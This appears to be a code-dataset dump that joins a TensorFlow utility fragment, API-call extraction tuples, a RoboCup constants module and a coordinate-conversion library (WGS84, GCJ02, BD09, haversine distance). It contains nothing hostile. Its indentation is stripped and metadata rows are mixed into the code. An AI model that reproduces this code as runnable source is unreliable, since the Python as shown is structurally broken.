h = tf.reshape(h, [nsteps, nbatch, -1])
return [tf.squeeze(v, [0]) for v in tf.split(axis=0, num_or_size_splits=nsteps, value=h)]
def seq_to_batch(h, flat = False):
"""
Assumes Time major data!!
x.shape = [nsteps, nbatch, *obs_shape]
x = output.reshape(nsteps, nbatch, *obs_shape), where output is the output of this function.
"""
shape = h[0].get_shape().as_list()
if not flat:
assert(len(shape) > 1)
nh = h[0].get_shape()[-1].value
return tf.reshape(tf.concat(axis=0, values=h), [-1, nh])
else:
return tf.reshape(tf.stack(values=h, axis=0), [-1])
def ortho_init(scale=1.0):
def _ortho_init(shape, dtype, partition_info=None):
#lasagne ortho init for tf
shape = tuple(shape)
if len(shape) == 2:
flat_shape = shape
elif len(shape) == 4: # assumes NHWC
flat_shape = (np.prod(shape[:-1]), shape[-1])
else:
raise NotImplementedError
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v # pick the one with the correct shape
q = q.reshape(shape)
return (scale * q[:shape[0], :shape[1]]).astype(np.float32)
return _ortho_init
def normc_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
def lstm(xs, ms, s, scope, nh, init_scale=1.0):
nbatch, nin = [v.value for v in xs[0].get_shape()]
nsteps = len(xs)
with tf.variable_scope(scope):
wx = tf.get_variable("wx", [nin, nh*4], initializer=ortho_init(init_scale))
wh = tf.get_variable("wh", [nh, nh*4], initializer=ortho_init(init_scale))
b = tf.get_variable("b", [nh*4], initializer=tf.constant_initializer(0.0))
c, h = tf.split(axis=1, num_or_size_splits=2, value=s)
for idx, (x, m) in enumerate(zip(xs, ms)):
c = c*(1-m)
h = h*(1-m)
z = tf.matmul(x, wx) + tf.matmul(h, wh) + b
i, f, o, u = tf.split(axis=1, num_or_size_splits=4, value=z)
i = tf.nn.sigmoid(i)
f = tf.nn.sigmoid(f)
o = tf.nn.sigmoid(o)
u = tf.tanh(u)
c = f*c + i*u
h = o*tf.tanh(c)
xs[idx] = h
s = tf.concat(axis=1, values=[c, h])
return xs, s
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
# for inpt in inputs:
# if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
# assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = value
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
if value is not None:
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])
results = tf.get_default_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads, _ = tf.clip_by_global_norm(grads, clip_norm=clip_norm)
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
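# --- Hypothetical usage sketch (not part of the original file) ---
# Flatten every trainable parameter into one vector and write it back, assuming
# a default session exists and variables have been initialized:
#   params = tf.trainable_variables()
#   get_flat, set_from_flat = GetFlat(params), SetFromFlat(params)
#   theta = get_flat()                 # 1-D numpy array holding all parameters
#   set_from_flat(theta)               # assigns the same values back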
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
def reset():
global ALREADY_INITIALIZED
ALREADY_INITIALIZED = set()
tf.reset_default_graph()
"""
Random Seeds
"""
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
| [((60, 16, 62, 45), 'tensorflow.ConfigProto', 'tf.ConfigProto', (), '', True, 'import tensorflow as tf\n'), ((74, 5, 74, 23), 'functools.wraps', 'functools.wraps', ({(74, 21, 74, 22): 'f'}, {}), '(f)', False, 'import functools\n'), ((93, 12, 93, 28), 'tensorflow.train.Saver', 'tf.train.Saver', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((98, 12, 98, 28), 'tensorflow.train.Saver', 'tf.train.Saver', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((209, 11, 209, 58), 'tensorflow.split', 'tf.split', (), '', True, 'import tensorflow as tf\n'), ((222, 8, 222, 40), 'tensorflow.concat', 'tf.concat', (), '', True, 'import tensorflow as tf\n'), ((318, 12, 318, 40), 'tensorflow.gradients', 'tf.gradients', ({(318, 25, 318, 29): 'loss', (318, 31, 318, 39): 'var_list'}, {}), '(loss, var_list)', True, 'import tensorflow as tf\n'), ((357, 4, 357, 28), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((369, 4, 369, 21), 'numpy.random.seed', 'np.random.seed', ({(369, 19, 369, 20): 'i'}, {}), '(i)', True, 'import numpy as np\n'), ((370, 4, 370, 18), 'random.seed', 'random.seed', ({(370, 16, 370, 17): 'i'}, {}), '(i)', False, 'import random\n'), ((25, 16, 25, 42), 'tensorflow.cast', 'tf.cast', ({(25, 24, 25, 33): 'condition', (25, 35, 25, 41): '"""bool"""'}, {}), "(condition, 'bool')", True, 'import tensorflow as tf\n'), ((65, 15, 65, 54), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', (), '', True, 'import tensorflow as tf\n'), ((67, 15, 67, 43), 'tensorflow.Session', 'tf.Session', (), '', True, 'import tensorflow as tf\n'), ((85, 33, 85, 72), 'tensorflow.variables_initializer', 'tf.variables_initializer', ({(85, 58, 85, 71): 'new_variables'}, {}), '(new_variables)', True, 'import tensorflow as tf\n'), ((94, 18, 94, 42), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((97, 16, 97, 38), 'os.path.dirname', 'os.path.dirname', ({(97, 32, 97, 37): 'fname'}, {}), '(fname)', False, 'import os\n'), ((99, 15, 99, 39), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((104, 15, 104, 34), 'cloudpickle.load', 'cloudpickle.load', ({(104, 32, 104, 33): 'f'}, {}), '(f)', False, 'import cloudpickle\n'), ((108, 16, 108, 38), 'os.path.dirname', 'os.path.dirname', ({(108, 32, 108, 37): 'fname'}, {}), '(fname)', False, 'import os\n'), ((110, 8, 110, 33), 'cloudpickle.dump', 'cloudpickle.dump', ({(110, 25, 110, 28): 'obj', (110, 30, 110, 32): 'fh'}, {}), '(obj, fh)', False, 'import cloudpickle\n'), ((138, 16, 138, 69), 'os.path.join', 'os.path.join', ({(138, 29, 138, 40): 'self.logdir', (138, 42, 138, 68): '"""checkpoints/model_fn.pkl"""'}, {}), "(self.logdir, 'checkpoints/model_fn.pkl')", False, 'import os\n'), ((139, 15, 139, 36), 'os.path.exists', 'os.path.exists', ({(139, 30, 139, 35): 'fname'}, {}), '(fname)', False, 'import os\n'), ((143, 16, 143, 69), 'os.path.join', 'os.path.join', ({(143, 29, 143, 40): 'self.logdir', (143, 42, 143, 68): '"""checkpoints/model_fn.pkl"""'}, {}), "(self.logdir, 'checkpoints/model_fn.pkl')", False, 'import os\n'), ((158, 12, 158, 43), 'tensorflow.reshape', 'tf.reshape', ({(158, 23, 158, 24): 'h', (158, 26, 158, 42): '[nsteps, nbatch]'}, {}), '(h, [nsteps, nbatch])', True, 'import tensorflow as tf\n'), ((160, 12, 160, 47), 'tensorflow.reshape', 'tf.reshape', ({(160, 23, 160, 24): 'h', (160, 26, 160, 46): '[nsteps, nbatch, -1]'}, {}), '(h, [nsteps, nbatch, -1])', True, 'import 
tensorflow as tf\n'), ((161, 12, 161, 30), 'tensorflow.squeeze', 'tf.squeeze', ({(161, 23, 161, 24): 'v', (161, 26, 161, 29): '[0]'}, {}), '(v, [0])', True, 'import tensorflow as tf\n'), ((187, 12, 187, 50), 'numpy.random.normal', 'np.random.normal', ({(187, 29, 187, 32): '0.0', (187, 34, 187, 37): '1.0', (187, 39, 187, 49): 'flat_shape'}, {}), '(0.0, 1.0, flat_shape)', True, 'import numpy as np\n'), ((188, 18, 188, 55), 'numpy.linalg.svd', 'np.linalg.svd', (), '', True, 'import numpy as np\n'), ((198, 15, 198, 31), 'tensorflow.constant', 'tf.constant', ({(198, 27, 198, 30): 'out'}, {}), '(out)', True, 'import tensorflow as tf\n'), ((204, 9, 204, 33), 'tensorflow.variable_scope', 'tf.variable_scope', ({(204, 27, 204, 32): 'scope'}, {}), '(scope)', True, 'import tensorflow as tf\n'), ((214, 21, 214, 68), 'tensorflow.split', 'tf.split', (), '', True, 'import tensorflow as tf\n'), ((215, 12, 215, 28), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', ({(215, 26, 215, 27): 'i'}, {}), '(i)', True, 'import tensorflow as tf\n'), ((216, 12, 216, 28), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', ({(216, 26, 216, 27): 'f'}, {}), '(f)', True, 'import tensorflow as tf\n'), ((217, 12, 217, 28), 'tensorflow.nn.sigmoid', 'tf.nn.sigmoid', ({(217, 26, 217, 27): 'o'}, {}), '(o)', True, 'import tensorflow as tf\n'), ((218, 12, 218, 22), 'tensorflow.tanh', 'tf.tanh', ({(218, 20, 218, 21): 'u'}, {}), '(u)', True, 'import tensorflow as tf\n'), ((278, 28, 278, 46), 'tensorflow.group', 'tf.group', ({(278, 37, 278, 45): '*updates'}, {}), '(*updates)', True, 'import tensorflow as tf\n'), ((315, 15, 315, 25), 'numpy.prod', 'np.prod', ({(315, 23, 315, 24): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((320, 19, 320, 69), 'tensorflow.clip_by_global_norm', 'tf.clip_by_global_norm', (), '', True, 'import tensorflow as tf\n'), ((332, 29, 332, 64), 'tensorflow.placeholder', 'tf.placeholder', ({(332, 44, 332, 49): 'dtype', (332, 51, 332, 63): '[total_size]'}, {}), '(dtype, [total_size])', True, 'import tensorflow as tf\n'), ((339, 18, 339, 36), 'tensorflow.group', 'tf.group', ({(339, 27, 339, 35): '*assigns'}, {}), '(*assigns)', True, 'import tensorflow as tf\n'), ((368, 8, 368, 29), 'tensorflow.set_random_seed', 'tf.set_random_seed', ({(368, 27, 368, 28): 'i'}, {}), '(i)', True, 'import tensorflow as tf\n'), ((47, 8, 47, 17), 'tensorflow.abs', 'tf.abs', ({(47, 15, 47, 16): 'x'}, {}), '(x)', True, 'import tensorflow as tf\n'), ((48, 8, 48, 20), 'tensorflow.square', 'tf.square', ({(48, 18, 48, 19): 'x'}, {}), '(x)', True, 'import tensorflow as tf\n'), ((76, 13, 76, 25), 'tensorflow.Session', 'tf.Session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((84, 24, 84, 45), 'tensorflow.global_variables', 'tf.global_variables', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((85, 4, 85, 28), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((115, 20, 115, 55), 'os.path.join', 'os.path.join', ({(115, 33, 115, 39): 'logdir', (115, 41, 115, 54): '"""checkpoints"""'}, {}), "(logdir, 'checkpoints')", False, 'import os\n'), ((161, 40, 161, 92), 'tensorflow.split', 'tf.split', (), '', True, 'import tensorflow as tf\n'), ((173, 26, 173, 53), 'tensorflow.concat', 'tf.concat', (), '', True, 'import tensorflow as tf\n'), ((175, 26, 175, 52), 'tensorflow.stack', 'tf.stack', (), '', True, 'import tensorflow as tf\n'), ((220, 14, 220, 24), 'tensorflow.tanh', 'tf.tanh', ({(220, 22, 220, 23): 'c'}, {}), '(c)', True, 'import tensorflow as tf\n'), ((49, 17, 49, 26), 
'tensorflow.abs', 'tf.abs', ({(49, 24, 49, 25): 'x'}, {}), '(x)', True, 'import tensorflow as tf\n'), ((59, 49, 59, 76), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ({}, {}), '()', False, 'import multiprocessing\n'), ((121, 27, 121, 69), 'os.path.join', 'os.path.join', ({(121, 40, 121, 51): 'self.logdir', (121, 53, 121, 68): '"""checkpoints/*"""'}, {}), "(self.logdir, 'checkpoints/*')", False, 'import os\n'), ((196, 14, 196, 37), 'numpy.random.randn', 'np.random.randn', ({(196, 30, 196, 36): '*shape'}, {}), '(*shape)', True, 'import numpy as np\n'), ((207, 53, 207, 81), 'tensorflow.constant_initializer', 'tf.constant_initializer', ({(207, 77, 207, 80): '0.0'}, {}), '(0.0)', True, 'import tensorflow as tf\n'), ((213, 12, 213, 28), 'tensorflow.matmul', 'tf.matmul', ({(213, 22, 213, 23): 'x', (213, 25, 213, 27): 'wx'}, {}), '(x, wx)', True, 'import tensorflow as tf\n'), ((213, 31, 213, 47), 'tensorflow.matmul', 'tf.matmul', ({(213, 41, 213, 42): 'h', (213, 44, 213, 46): 'wh'}, {}), '(h, wh)', True, 'import tensorflow as tf\n'), ((342, 8, 342, 32), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((349, 15, 349, 39), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((184, 26, 184, 45), 'numpy.prod', 'np.prod', ({(184, 34, 184, 44): 'shape[:-1]'}, {}), '(shape[:-1])', True, 'import numpy as np\n'), ((298, 18, 298, 42), 'tensorflow.get_default_session', 'tf.get_default_session', ({}, {}), '()', True, 'import tensorflow as tf\n'), ((337, 40, 337, 84), 'tensorflow.reshape', 'tf.reshape', ({(337, 51, 337, 76): 'theta[start:start + size]', (337, 78, 337, 83): 'shape'}, {}), '(theta[start:start + size], shape)', True, 'import tensorflow as tf\n'), ((197, 29, 197, 43), 'numpy.square', 'np.square', ({(197, 39, 197, 42): 'out'}, {}), '(out)', True, 'import numpy as np\n'), ((322, 49, 322, 65), 'tensorflow.zeros_like', 'tf.zeros_like', ({(322, 63, 322, 64): 'v'}, {}), '(v)', True, 'import tensorflow as tf\n'), ((124, 42, 124, 61), 'os.path.basename', 'os.path.basename', ({(124, 59, 124, 60): 'f'}, {}), '(f)', False, 'import os\n')] |
RoboCupULaval/StrategyAI | Util/constant.py | ccddde144f2c0a67113d2e5ffe7c75ed9d4a3d19 | # Under MIT License, see LICENSE.txt
""" Module définissant des constantes de programmations python pour l'IA """
from enum import Enum
ROBOT_RADIUS = 90
ROBOT_DIAMETER = ROBOT_RADIUS * 2
ROBOT_CENTER_TO_KICKER = 60
BALL_RADIUS = 21
MAX_PLAYER_ON_FIELD_PER_TEAM = 6
BALL_OUTSIDE_FIELD_BUFFER = 200
# Radius and angles for tactics
DISTANCE_BEHIND = ROBOT_RADIUS + 30 # in millimeters
ANGLE_TO_GRAB_BALL = 1 # in radians; must be large in case ball moves fast
RADIUS_TO_GRAB_BALL = ROBOT_RADIUS + 30
ANGLE_TO_HALT = 0.05 # 3 degrees
RADIUS_TO_HALT = ROBOT_RADIUS + BALL_RADIUS
REASONABLE_OFFSET = 50 # To take into account the camera precision and other things
# Rules
KEEPOUT_DISTANCE_FROM_BALL = 500 + ROBOT_RADIUS + REASONABLE_OFFSET
KEEPOUT_DISTANCE_FROM_GOAL = ROBOT_RADIUS + REASONABLE_OFFSET
PADDING_DEFENSE_AREA = 100
# Rule 5.2: Minimum movement before a ball is "in play"
IN_PLAY_MIN_DISTANCE = 50
# Rule 8.2.1: Distance from the opposing team defending zone
INDIRECT_KICK_OFFSET = 200
# Deadzones
POSITION_DEADZONE = ROBOT_RADIUS * 0.1
# Orientation abs_tol
ORIENTATION_ABSOLUTE_TOLERANCE = 0.01 # 0.5 degree
# TeamColor
class TeamColor(Enum):
def __str__(self):
return 'blue' if self == TeamColor.BLUE else 'yellow'
YELLOW = 0
BLUE = 1
class FieldSide(Enum):
POSITIVE = 0
NEGATIVE = 1
class KickForce(Enum):
NONE = 0
LOW = 1
MEDIUM = 2
HIGH = 3
@classmethod
def for_dist(cls, dist, seconds_to_reach=1.0):
speed = (dist / 1000) / seconds_to_reach
return speed
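        # Illustrative example (not in the original): for_dist(2000) -> 2.0,
        # i.e. covering 2 m in 1 s requires a kick speed of 2 m/s.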
class KickType(Enum):
DIRECT = 0
CHIP = 1
class DribbleState(Enum):
AUTOMATIC = 0
FORCE_STOP = 1
FORCE_SPIN = 2
| [] |
cirno1w/transport | src/transbigdata/CoordinatesConverter.py | f088b4111992dd5ec6371db71cf1d26689cf8c26 |
import numpy as np
x_pi = 3.14159265358979324 * 3000.0 / 180.0
pi = 3.1415926535897932384626
a = 6378245.0
ee = 0.00669342162296594323
def gcj02tobd09(lng, lat):
"""
Convert coordinates from GCJ02 to BD09
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lng = lng.astype(float)
lat = lat.astype(float)
except:
lng = float(lng)
lat = float(lat)
z = np.sqrt(lng * lng + lat * lat) + 0.00002 * np.sin(lat * x_pi)
theta = np.arctan2(lat, lng) + 0.000003 * np.cos(lng * x_pi)
bd_lng = z * np.cos(theta) + 0.0065
bd_lat = z * np.sin(theta) + 0.006
return bd_lng, bd_lat
def bd09togcj02(bd_lon, bd_lat):
"""
Convert coordinates from BD09 to GCJ02
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
bd_lon = bd_lon.astype(float)
bd_lat = bd_lat.astype(float)
except:
bd_lon = float(bd_lon)
bd_lat = float(bd_lat)
x = bd_lon - 0.0065
y = bd_lat - 0.006
z = np.sqrt(x * x + y * y) - 0.00002 * np.sin(y * x_pi)
theta = np.arctan2(y, x) - 0.000003 * np.cos(x * x_pi)
gg_lng = z * np.cos(theta)
gg_lat = z * np.sin(theta)
return gg_lng, gg_lat
def wgs84togcj02(lng, lat):
"""
Convert coordinates from WGS84 to GCJ02
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lng = lng.astype(float)
lat = lat.astype(float)
except:
lng = float(lng)
lat = float(lat)
dlat = transformlat(lng - 105.0, lat - 35.0)
dlng = transformlng(lng - 105.0, lat - 35.0)
radlat = lat / 180.0 * pi
magic = np.sin(radlat)
magic = 1 - ee * magic * magic
sqrtmagic = np.sqrt(magic)
dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi)
dlng = (dlng * 180.0) / (a / sqrtmagic * np.cos(radlat) * pi)
mglat = lat + dlat
mglng = lng + dlng
return mglng, mglat
def gcj02towgs84(lng, lat):
"""
Convert coordinates from GCJ02 to WGS84
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lng = lng.astype(float)
lat = lat.astype(float)
except:
lng = float(lng)
lat = float(lat)
dlat = transformlat(lng - 105.0, lat - 35.0)
dlng = transformlng(lng - 105.0, lat - 35.0)
radlat = lat / 180.0 * pi
magic = np.sin(radlat)
magic = 1 - ee * magic * magic
sqrtmagic = np.sqrt(magic)
dlat = (dlat * 180.0) / ((a * (1 - ee)) / (magic * sqrtmagic) * pi)
dlng = (dlng * 180.0) / (a / sqrtmagic * np.cos(radlat) * pi)
mglat = lat + dlat
mglng = lng + dlng
return lng * 2 - mglng, lat * 2 - mglat
def wgs84tobd09(lon,lat):
"""
Convert coordinates from WGS84 to BD09
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lon = lon.astype(float)
lat = lat.astype(float)
except:
lon = float(lon)
lat = float(lat)
lon,lat = wgs84togcj02(lon,lat)
lon,lat = gcj02tobd09(lon,lat)
return lon,lat
def bd09towgs84(lon,lat):
"""
Convert coordinates from BD09 to WGS84
Parameters
-------
lng : Series or number
Longitude
lat : Series or number
Latitude
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
try:
lon = lon.astype(float)
lat = lat.astype(float)
except:
lon = float(lon)
lat = float(lat)
lon,lat = bd09togcj02(lon,lat)
lon,lat = gcj02towgs84(lon,lat)
return lon,lat
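# --- Illustrative usage (editor's sketch, not part of the original module) ---
# A minimal round-trip example with plain numbers; the same calls also accept
# pandas Series. The coordinates are arbitrary placeholders, and a small
# residual error after the round trip is expected because the two transforms
# are only approximate inverses of each other.
#
#   bd_lng, bd_lat = wgs84tobd09(121.47, 31.23)   # WGS84 -> BD09
#   lng, lat = bd09towgs84(bd_lng, bd_lat)        # BD09 -> (approximately) WGS84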
def bd09mctobd09(x,y):
"""
Convert coordinates from BD09MC to BD09
Parameters
-------
x : Series or number
x coordinates
y : Series or number
y coordinates
return
-------
lng : Series or number
Longitude (Converted)
lat : Series or number
Latitude (Converted)
"""
MCBAND = [12890594.86, 8362377.87, 5591021, 3481989.83, 1678043.12, 0]
MC2LL = [
[1.410526172116255e-8, 0.00000898305509648872, -1.9939833816331, 200.9824383106796, -187.2403703815547, 91.6087516669843, -23.38765649603339, 2.57121317296198, -0.03801003308653, 17337981.2],
[-7.435856389565537e-9, 0.000008983055097726239, -0.78625201886289, 96.32687599759846, -1.85204757529826, -59.36935905485877, 47.40033549296737, -16.50741931063887, 2.28786674699375, 10260144.86],
[-3.030883460898826e-8, 0.00000898305509983578, 0.30071316287616, 59.74293618442277, 7.357984074871, -25.38371002664745, 13.45380521110908, -3.29883767235584, 0.32710905363475, 6856817.37],
[-1.981981304930552e-8, 0.000008983055099779535, 0.03278182852591, 40.31678527705744, 0.65659298677277, -4.44255534477492, 0.85341911805263, 0.12923347998204, -0.04625736007561, 4482777.06],
[3.09191371068437e-9, 0.000008983055096812155, 0.00006995724062, 23.10934304144901, -0.00023663490511, -0.6321817810242, -0.00663494467273, 0.03430082397953, -0.00466043876332, 2555164.4],
[2.890871144776878e-9, 0.000008983055095805407, -3.068298e-8, 7.47137025468032, -0.00000353937994, -0.02145144861037, -0.00001234426596, 0.00010322952773, -0.00000323890364, 826088.5]
]
y1 = y.iloc[0]
for cD in range(len(MCBAND)):
if y1 >= MCBAND[cD]:
cE = MC2LL[cD]
break
cD = cE
    T = cD[0] + cD[1] * np.abs(x)
cB = np.abs(y) / cD[9]
cE = cD[2] + cD[3] * cB + cD[4] * cB * cB +\
cD[5] * cB * cB * cB + cD[6] * cB * cB * cB * cB +\
cD[7] * cB * cB * cB * cB * cB +\
cD[8] * cB * cB * cB * cB * cB * cB
return T,cE
def transformlat(lng, lat):
ret = -100.0 + 2.0 * lng + 3.0 * lat + 0.2 * lat * lat + \
0.1 * lng * lat + 0.2 * np.sqrt(np.fabs(lng))
ret += (20.0 * np.sin(6.0 * lng * pi) + 20.0 *
np.sin(2.0 * lng * pi)) * 2.0 / 3.0
ret += (20.0 * np.sin(lat * pi) + 40.0 *
np.sin(lat / 3.0 * pi)) * 2.0 / 3.0
ret += (160.0 * np.sin(lat / 12.0 * pi) + 320 *
np.sin(lat * pi / 30.0)) * 2.0 / 3.0
return ret
def transformlng(lng, lat):
import numpy as np
ret = 300.0 + lng + 2.0 * lat + 0.1 * lng * lng + \
0.1 * lng * lat + 0.1 * np.sqrt(np.abs(lng))
ret += (20.0 * np.sin(6.0 * lng * pi) + 20.0 *
np.sin(2.0 * lng * pi)) * 2.0 / 3.0
ret += (20.0 * np.sin(lng * pi) + 40.0 *
np.sin(lng / 3.0 * pi)) * 2.0 / 3.0
ret += (150.0 * np.sin(lng / 12.0 * pi) + 300.0 *
np.sin(lng / 30.0 * pi)) * 2.0 / 3.0
return ret
def getdistance(lon1, lat1, lon2, lat2):
'''
    Compute the great-circle (haversine) distance, in metres, between an origin [lon1, lat1] and a destination [lon2, lat2] given in decimal degrees. Inputs may be Series or single numbers.
Parameters
-------
lon1 : Series or number
Start longitude
lat1 : Series or number
Start latitude
lon2 : Series or number
End longitude
lat2 : Series or number
End latitude
return
-------
distance : Series or number
The distance
'''
try:
lon1 = lon1.astype(float)
lat1 = lat1.astype(float)
lon2 = lon2.astype(float)
lat2 = lat2.astype(float)
except:
lon1 = float(lon1)
lat1 = float(lat1)
lon2 = float(lon2)
lat2 = float(lat2)
lon1, lat1, lon2, lat2 = map(lambda r:r*pi/180, [lon1, lat1, lon2, lat2])
dlon = lon2 - lon1
dlat = lat2 - lat1
a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2
c = 2 * np.arcsin(a**0.5)
    r = 6371  # mean Earth radius, in kilometres
return c * r * 1000
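# --- Illustrative usage (editor's sketch, not part of the original module) ---
# A minimal example of the haversine distance above with plain numbers (Series
# work the same way). The points are roughly Beijing and Shanghai, so the
# result is on the order of 1e6 metres.
#
#   d = getdistance(116.40, 39.90, 121.47, 31.23)
#   print(round(d / 1000), 'km')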
def transform_shape(gdf,method):
'''
    Convert the coordinates of every geometry in a GeoDataFrame of geographic elements, using the given converting function.
Parameters
-------
gdf : GeoDataFrame
Geographic elements
method : function
The coordinate converting function
return
-------
gdf : GeoDataFrame
The result of converting
'''
from shapely.ops import transform
gdf1 = gdf.copy()
gdf1['geometry'] = gdf1['geometry'].apply(lambda r:transform(method, r))
return gdf1 | [((99, 12, 99, 26), 'numpy.sin', 'np.sin', ({(99, 19, 99, 25): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((101, 16, 101, 30), 'numpy.sqrt', 'np.sqrt', ({(101, 24, 101, 29): 'magic'}, {}), '(magic)', True, 'import numpy as np\n'), ((136, 12, 136, 26), 'numpy.sin', 'np.sin', ({(136, 19, 136, 25): 'radlat'}, {}), '(radlat)', True, 'import numpy as np\n'), ((138, 16, 138, 30), 'numpy.sqrt', 'np.sqrt', ({(138, 24, 138, 29): 'magic'}, {}), '(magic)', True, 'import numpy as np\n'), ((32, 8, 32, 38), 'numpy.sqrt', 'np.sqrt', ({(32, 16, 32, 37): '(lng * lng + lat * lat)'}, {}), '(lng * lng + lat * lat)', True, 'import numpy as np\n'), ((33, 12, 33, 32), 'numpy.arctan2', 'np.arctan2', ({(33, 23, 33, 26): 'lat', (33, 28, 33, 31): 'lng'}, {}), '(lat, lng)', True, 'import numpy as np\n'), ((65, 8, 65, 30), 'numpy.sqrt', 'np.sqrt', ({(65, 16, 65, 29): '(x * x + y * y)'}, {}), '(x * x + y * y)', True, 'import numpy as np\n'), ((66, 12, 66, 28), 'numpy.arctan2', 'np.arctan2', ({(66, 23, 66, 24): 'y', (66, 26, 66, 27): 'x'}, {}), '(y, x)', True, 'import numpy as np\n'), ((67, 17, 67, 30), 'numpy.cos', 'np.cos', ({(67, 24, 67, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((68, 17, 68, 30), 'numpy.sin', 'np.sin', ({(68, 24, 68, 29): 'theta'}, {}), '(theta)', True, 'import numpy as np\n'), ((235, 9, 235, 18), 'numpy.abs', 'np.abs', ({(235, 16, 235, 17): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((299, 